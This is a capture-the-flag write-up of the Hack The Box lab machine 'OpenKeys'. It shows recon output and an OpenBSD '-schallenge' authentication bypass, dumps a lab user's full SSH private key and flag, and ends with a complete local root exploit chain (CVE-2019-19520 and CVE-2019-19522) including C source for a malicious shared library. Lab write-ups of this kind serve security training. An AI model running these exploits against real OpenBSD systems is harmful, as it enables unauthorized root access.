Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.
Summary
- Need to recover auth.php with
vim. - Exploit authentication bypass vulnerability OpenBSD with
-schallengeas the credential for the username. - Create a username with the value
jenniferin order to getsshprivate key of the user. - Execute
OpenBSDexploitCVE-2019-19521to get root.
Port Scans
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@lordrhovelionz:~/htb/openkeys# nmap -sCV -T4 openkeys.htb -oA nmap/output
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 09:20 WIB
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
| 256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_ 256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open http OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.97 seconds
Website
We have login page on index.php
I tried few default credential with no luck.
Fuzzing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@lordrhovelionz:~/htb/openkeys# gobuster dir -u 10.10.10.199 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.199
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/08/10 09:21:58 Starting gobuster
===============================================================
/index.php (Status: 200)
/images (Status: 301)
/css (Status: 301)
/includes (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/fonts (Status: 301)
Browse openkeys.htb/includes/ and found there are 2 files
Swap file
I downloaded the file using wget
1
2
3
4
5
6
7
8
9
10
11
12
root@lordrhovelionz:~/htb/openkeys# wget http://10.10.10.199/includes/auth.php.swp
--2020-08-10 09:28:53-- http://10.10.10.199/includes/auth.php.swp
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp.1’
auth.php.swp.1 [ <=> ] 12.00K 47.3KB/s in 0.3s
2020-08-10 09:28:54 (47.3 KB/s) - ‘auth.php.swp.1’ saved [12288]
root@lordrhovelionz:~/htb/openkeys#
Identify the file with command file, it shows username jennifer
1
2
3
root@lordrhovelionz:~/htb/openkeys# file auth.php.swp
auth.php.swp: Vim swap file, version 8.1, pid 49850, user jennifer, host openkeys.htb, file /var/www/htdocs/includes/auth.php
root@lordrhovelionz:~/htb/openkeys#
I tried to executed it but the file is broken
1
2
root@lordrhovelionz:~/htb/openkeys# less auth.php.swp
"auth.php.swp" may be a binary file. See it anyway?
So I recovered it.
1
vim -r auth.php.swp -> save it
And now I can read the php code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php
function authenticate($username, $password)
$cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
system($cmd, $retcode);
return $retcode;
function is_active_session()
// Session timeout in seconds
$session_timeout = 300;
// Start the session
session_start();
// Is the user logged in?
if(isset($_SESSION["logged_in"]))
{
// Has the session expired?
$time = $_SERVER['REQUEST_TIME'];
if (isset($_SESSION['last_activity']) &&
($time - $_SESSION['last_activity']) > $session_timeout)
{
close_session();
return False;
}
else
{
// Session is active, update last activity time and return True
$_SESSION['last_activity'] = $time;
return True;
}
}
else
{
return False;
}
function init_session()
$_SESSION["logged_in"] = True;
$_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
$_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
$_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
$_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
$_SESSION["username"] = $_REQUEST['username'];
function close_session()
session_unset();
session_destroy();
session_start();
?>
Check auth_binary
Found something on line 3 of the php code, I found that ../auth_helpers/check_auth seems accessible.
I downloaded the check_auth using wget
1
2
3
4
5
6
7
8
9
10
11
12
root@lordrhovelionz:~/htb/openkeys# wget http://10.10.10.199/auth_helpers/check_auth
--2020-08-10 09:38:48-- http://10.10.10.199/auth_helpers/check_auth
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12288 (12K) [application/octet-stream]
Saving to: ‘check_auth’
check_auth 100%[==================================================================================================================>] 12.00K 39.3KB/s in 0.3s
2020-08-10 09:38:49 (39.3 KB/s) - ‘check_auth’ saved [12288/12288]
root@lordrhovelionz:~/htb/openkeys#
Identify it with file commands, it shows its binary 64-bit.
1
2
3
root@lordrhovelionz:~/htb/openkeys# file check_auth
check_auth: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /usr/libexec/ld.so, for OpenBSD, not stripped
root@lordrhovelionz:~/htb/openkeys#
I tried reversing the check_auth binary with ida_pro and the decompiled code did not give anything useful.
At this point I have no idea what to do since I don’t know much about OpenBSD, while doing research, I found that an article that points out -schallenge is a potential username to login with any arbitrary password.
Edit cookie
the swap file shows that jennifer, so we put it as value in the cookie editor.
After saved it, I tried to login again with -schallenge, we found jennifer's private-key.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
root@lordrhovelionz:~/htb/openkeys# cat jennifer_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAo4LwXsnKH6jzcmIKSlePCo/2YWklHnGn50YeINLm7LqVMDJJnbNx
OI6lTsb9qpn0zhehBS2RCx/i6YNWpmBBPCy6s2CxsYSiRd3S7NftPNKanTTQFKfOpEn7rG
nag+n7Ke+iZ1U/FEw4yNwHrrEI2pklGagQjnZgZUADzxVArjN5RsAPYE50mpVB7JO8E7DR
PWCfMNZYd7uIFBVRrQKgM/n087fUyEyFZGibq8BRLNNwUYidkJOmgKSFoSOa9+6B0ou5oU
qjP7fp0kpsJ/XM1gsDR/75lxegO22PPfz15ZC04APKFlLJo1ZEtozcmBDxdODJ3iTXj8Js
kLV+lnJAMInjK3TOoj9F4cZ5WTk29v/c7aExv9zQYZ+sHdoZtLy27JobZJli/9veIp8hBG
717QzQxMmKpvnlc76HLigzqmNoq4UxSZlhYRclBUs3l5CU9pdsCb3U1tVSFZPNvQgNO2JD
S7O6sUJFu6mXiolTmt9eF+8SvEdZDHXvAqqvXqBRAAAFmKm8m76pvJu+AAAAB3NzaC1yc2
EAAAGBAKOC8F7Jyh+o83JiCkpXjwqP9mFpJR5xp+dGHiDS5uy6lTAySZ2zcTiOpU7G/aqZ
9M4XoQUtkQsf4umDVqZgQTwsurNgsbGEokXd0uzX7TzSmp000BSnzqRJ+6xp2oPp+ynvom
dVPxRMOMjcB66xCNqZJRmoEI52YGVAA88VQK4zeUbAD2BOdJqVQeyTvBOw0T1gnzDWWHe7
iBQVUa0CoDP59PO31MhMhWRom6vAUSzTcFGInZCTpoCkhaEjmvfugdKLuaFKoz+36dJKbC
f1zNYLA0f++ZcXoDttjz389eWQtOADyhZSyaNWRLaM3JgQ8XTgyd4k14/CbJC1fpZyQDCJ
4yt0zqI/ReHGeVk5Nvb/3O2hMb/c0GGfrB3aGbS8tuyaG2SZYv/b3iKfIQRu9e0M0MTJiq
b55XO+hy4oM6pjaKuFMUmZYWEXJQVLN5eQlPaXbAm91NbVUhWTzb0IDTtiQ0uzurFCRbup
l4qJU5rfXhfvErxHWQx17wKqr16gUQAAAAMBAAEAAAGBAJjT/uUpyIDVAk5L8oBP3IOr0U
Z051vQMXZKJEjbtzlWn7C/n+0FVnLdaQb7mQcHBThH/5l+YI48THOj7a5uUyryR8L3Qr7A
UIfq8IWswLHTyu3a+g4EVnFaMSCSg8o+PSKSN4JLvDy1jXG3rnqKP9NJxtJ3MpplbG3Wan
j4zU7FD7qgMv759aSykz6TSvxAjSHIGKKmBWRL5MGYt5F03dYW7+uITBq24wrZd38NrxGt
wtKCVXtXdg3ROJFHXUYVJsX09Yv5tH5dxs93Re0HoDSLZuQyIc5iDHnR4CT+0QEX14u3EL
TxaoqT6GBtynwP7Z79s9G5VAF46deQW6jEtc6akIbcyEzU9T3YjrZ2rAaECkJo4+ppjiJp
NmDe8LSyaXKDIvC8lb3b5oixFZAvkGIvnIHhgRGv/+pHTqo9dDDd+utlIzGPBXsTRYG2Vz
j7Zl0cYleUzPXdsf5deSpoXY7axwlyEkAXvavFVjU1UgZ8uIqu8W1BiODbcOK8jMgDkQAA
AMB0rxI03D/q8PzTgKml88XoxhqokLqIgevkfL/IK4z8728r+3jLqfbR9mE3Vr4tPjfgOq
eaCUkHTiEo6Z3TnkpbTVmhQbCExRdOvxPfPYyvI7r5wxkTEgVXJTuaoUJtJYJJH2n6bgB3
WIQfNilqAesxeiM4MOmKEQcHiGNHbbVW+ehuSdfDmZZb0qQkPZK3KH2ioOaXCNA0h+FC+g
dhqTJhv2vl1X/Jy/assyr80KFC9Eo1DTah2TLnJZJpuJjENS4AAADBAM0xIVEJZWEdWGOg
G1vwKHWBI9iNSdxn1c+SHIuGNm6RTrrxuDljYWaV0VBn4cmpswBcJ2O+AOLKZvnMJlmWKy
Dlq6MFiEIyVKqjv0pDM3C2EaAA38szMKGC+Q0Mky6xvyMqDn6hqI2Y7UNFtCj1b/aLI8cB
rfBeN4sCM8c/gk+QWYIMAsSWjOyNIBjy+wPHjd1lDEpo2DqYfmE8MjpGOtMeJjP2pcyWF6
CxcVbm6skasewcJa4Bhj/MrJJ+KjpIjQAAAMEAy/+8Z+EM0lHgraAXbmmyUYDV3uaCT6ku
Alz0bhIR2/CSkWLHF46Y1FkYCxlJWgnn6Vw43M0yqn2qIxuZZ32dw1kCwW4UNphyAQT1t5
eXBJSsuum8VUW5oOVVaZb1clU/0y5nrjbbqlPfo5EVWu/oE3gBmSPfbMKuh9nwsKJ2fi0P
bp1ZxZvcghw2DwmKpxc+wWvIUQp8NEe6H334hC0EAXalOgmJwLXNPZ+nV6pri4qLEM6mcT
qtQ5OEFcmVIA/VAAAAG2plbm5pZmVyQG9wZW5rZXlzLmh0Yi5sb2NhbAECAwQFBgc=
-----END OPENSSH PRIVATE KEY-----
root@lordrhovelionz:~/htb/openkeys#
SSH as jennifer
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@lordrhovelionz:~/htb/openkeys# chmod 600 jennifer_rsa
root@lordrhovelionz:~/htb/openkeys# ssh -i jennifer_rsa jennifer@openkeys.htb
Last login: Sun Aug 9 14:13:58 2020 from 10.10.14.65
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
openkeys$ ls -la
total 364
drwxr-xr-x 3 jennifer jennifer 512 Aug 9 14:27 .
drwxr-xr-x 3 root wheel 512 Jan 13 2020 ..
-rw-r--r-- 1 jennifer jennifer 87 Jan 13 2020 .Xdefaults
-rw-r--r-- 1 jennifer jennifer 771 Jan 13 2020 .cshrc
-rw-r--r-- 1 jennifer jennifer 101 Jan 13 2020 .cvsrc
-rw-r--r-- 1 jennifer jennifer 359 Jan 13 2020 .login
-rw-r--r-- 1 jennifer jennifer 175 Jan 13 2020 .mailrc
-rw-r--r-- 1 jennifer jennifer 215 Jan 13 2020 .profile
drwx------ 2 jennifer jennifer 512 Jan 13 2020 .ssh
-rwxr-xr-x 1 jennifer jennifer 4087 Aug 9 14:26 CVE-2019-19520.sh
-rwxr-xr-x 1 jennifer jennifer 161009 Aug 9 14:16 linpeas.sh
-rw-r----- 1 jennifer jennifer 33 Jan 14 2020 user.txt
1
2
3
openkeys$ cat user.txt
36ab21239a15c537bde90626891d2b10
openkeys$
Escalating to root
I found great article about the exploitation and it has 3 CVEs Exploits
There are 3 CVEs to get root, I used CVE-2019-19520 & CVE-2019-19522 which both of them are related to each other, in order to get root, we have to executed CVE-2019-19520 before CVE-2019-19522.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
$ cd /tmp
$ cat > swrast_dri.c << "EOF"
#include <paths.h>
#include <sys/types.h>
#include <unistd.h>
static void __attribute__ ((constructor)) _init (void) {
gid_t rgid, egid, sgid;
if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);
if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
char * const argv[] = { _PATH_KSHELL, NULL };
execve(argv[0], argv, NULL);
_exit(__LINE__);
}
EOF
$ gcc -fpic -shared -s -o swrast_dri.so swrast_dri.c
$ env -i /usr/X11R6/bin/Xvfb :66 -cc 0 &
[1] 2706
$ env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display :66
$ id
uid=32767(nobody) gid=11(auth) groups=32767(nobody)
And now continue with the next CVE, it asked for password, simply input EGG LARD GROW HOG DRAG LAIN
1
2
3
4
5
6
7
8
9
10
11
12
13
$ id
uid=32767(nobody) gid=11(auth) groups=32767(nobody)
$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root
$ chmod 0600 /etc/skey/root
$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN
# id
uid=0(root) gid=0(wheel)
